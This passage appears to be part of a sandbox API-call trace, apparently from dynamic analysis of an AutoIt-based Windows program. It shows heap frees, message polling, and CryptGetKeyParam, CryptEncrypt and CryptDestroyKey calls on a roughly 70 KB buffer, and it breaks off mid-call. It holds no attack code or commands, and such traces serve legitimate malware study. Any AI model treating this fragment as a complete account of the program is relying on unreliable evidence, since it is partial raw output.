hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0176.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0176.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0176.041] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0176.041] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2638, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2638*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0176.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0176.043] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0176.043] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0176.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0176.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0176.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0176.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0176.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0176.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0176.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0176.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0176.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.044] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0176.044] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.044] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.044] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0176.044] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.044] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.044] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0176.045] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0176.045] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0176.045] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.070] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.070] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0176.071] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.071] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x111a6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x111b0) returned 1 [0176.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.071] CharLowerBuffW (in: lpsz="byte[70065]", cchLength=0xb | out: lpsz="byte[70065]") returned 0xb [0176.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.072] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.072] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.072] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0176.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.073] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9e74e0*, pdwDataLen=0x87e820*=0x111a6, dwBufLen=0x111b0 | out: pbData=0x9e74e0*, pdwDataLen=0x87e820*=0x111b0) returned 1 [0176.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.074] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.074] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.074] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0176.074] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.074] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0176.074] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0176.074] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0176.074] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.074] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.074] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0176.074] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.074] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.074] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.080] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.080] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.080] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.085] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.085] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.085] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0176.085] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0176.085] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.085] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0176.085] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.085] CryptDestroyKey (hKey=0x90aed8) returned 1 [0176.088] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0176.088] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0176.089] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0176.089] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0176.089] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0176.089] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0176.089] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0176.089] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0176.089] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.089] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0176.089] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0176.089] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0176.089] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0176.089] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0176.089] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.089] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0176.089] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.089] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0176.089] PeekMessageW (in: 